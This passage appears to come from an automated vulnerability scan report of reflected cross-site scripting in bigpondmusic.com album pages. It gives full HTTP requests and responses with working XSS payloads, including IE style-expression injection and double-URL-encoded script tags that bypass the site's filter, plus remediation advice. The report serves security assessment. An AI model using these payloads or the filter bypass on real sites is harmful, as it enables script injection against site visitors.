This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/nelly/just-a-dream2?h=726722803fa568"style%3d"x%3aexpression(alert(1))"61488da52ac HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:19:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 104044
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Nelly - Just A Dream - BigPo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/just-a-dream2?h=726722803fa568"style="x:expression(alert(1))"61488da52ac" /> ...[SNIP]...
2.107. http://bigpondmusic.com/album/nelly/just-a-dream2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/nelly/just-a-dream2
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba87f"style%3d"x%3aexpression(alert(1))"31c7e4dd0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba87f"style="x:expression(alert(1))"31c7e4dd0c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/nelly/just-a-dream2?ba87f"style%3d"x%3aexpression(alert(1))"31c7e4dd0c=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 103886
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Nelly - Just A Dream - BigPo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/just-a-dream2?ba87f"style="x:expression(alert(1))"31c7e4dd0c=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6490e'%3b7485f0ca9f5 was submitted in the REST URL parameter 1. This input was echoed as 6490e';7485f0ca9f5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album6490e'%3b7485f0ca9f5/nicole-scherzinger/poison4 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:26:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88121
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e279f4e1735f was submitted in the REST URL parameter 1. This input was echoed as c62ff"><script>alert(1)</script>279f4e1735f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albumc62ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e279f4e1735f/nicole-scherzinger/poison4 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:26:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88450
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f969"style%3d"x%3aexpression(alert(1))"18b7bf8d52b was submitted in the h parameter. This input was echoed as 5f969"style="x:expression(alert(1))"18b7bf8d52b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/nicole-scherzinger/poison4?h=7653777365f969"style%3d"x%3aexpression(alert(1))"18b7bf8d52b HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:27:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 99468
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.111. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/nicole-scherzinger/poison4
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4465f"style%3d"x%3aexpression(alert(1))"01d427eeef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4465f"style="x:expression(alert(1))"01d427eeef0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/nicole-scherzinger/poison4?4465f"style%3d"x%3aexpression(alert(1))"01d427eeef0=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:26:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 99329
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3921'%3b1df4e93a53 was submitted in the REST URL parameter 1. This input was echoed as c3921';1df4e93a53 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumc3921'%3b1df4e93a53/p-nk/greatest-hits-so-far HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:20:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87896
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ed0f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50a9fabc3f3 was submitted in the REST URL parameter 1. This input was echoed as 8ed0f"><script>alert(1)</script>50a9fabc3f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album8ed0f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50a9fabc3f3/p-nk/greatest-hits-so-far HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:20:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88218
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.114. http://bigpondmusic.com/album/p-nk/greatest-hits-so-far [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/p-nk/greatest-hits-so-far
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b739"style%3d"x%3aexpression(alert(1))"0516aff5a34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b739"style="x:expression(alert(1))"0516aff5a34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/p-nk/greatest-hits-so-far?2b739"style%3d"x%3aexpression(alert(1))"0516aff5a34=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:20:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 134007
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b002'%3b2512425bfef was submitted in the REST URL parameter 1. This input was echoed as 7b002';2512425bfef in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album7b002'%3b2512425bfef/p-nk/raise-your-glass HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:20:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88131
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5901a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5cb7aa2bc8 was submitted in the REST URL parameter 1. This input was echoed as 5901a"><script>alert(1)</script>d5cb7aa2bc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album5901a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5cb7aa2bc8/p-nk/raise-your-glass HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:20:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88325
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f36a9"style%3d"x%3aexpression(alert(1))"6ca781435e0 was submitted in the h parameter. This input was echoed as f36a9"style="x:expression(alert(1))"6ca781435e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/p-nk/raise-your-glass?h=756314040f36a9"style%3d"x%3aexpression(alert(1))"6ca781435e0 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:21:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 105147
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>P!Nk - Raise Your Glass - Bi ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/raise-your-glass?h=756314040f36a9"style="x:expression(alert(1))"6ca781435e0" /> ...[SNIP]...
2.118. http://bigpondmusic.com/album/p-nk/raise-your-glass [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/p-nk/raise-your-glass
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c4d"style%3d"x%3aexpression(alert(1))"397b8c9825e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9c4d"style="x:expression(alert(1))"397b8c9825e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/p-nk/raise-your-glass?b9c4d"style%3d"x%3aexpression(alert(1))"397b8c9825e=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:20:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 104639
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>P!Nk - Raise Your Glass - Bi ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/raise-your-glass?b9c4d"style="x:expression(alert(1))"397b8c9825e=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e0a93acac3 was submitted in the REST URL parameter 1. This input was echoed as c0385"><script>alert(1)</script>3e0a93acac3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albumc0385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e0a93acac3/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88099
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4292b'%3b33844f2483 was submitted in the REST URL parameter 1. This input was echoed as 4292b';33844f2483 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
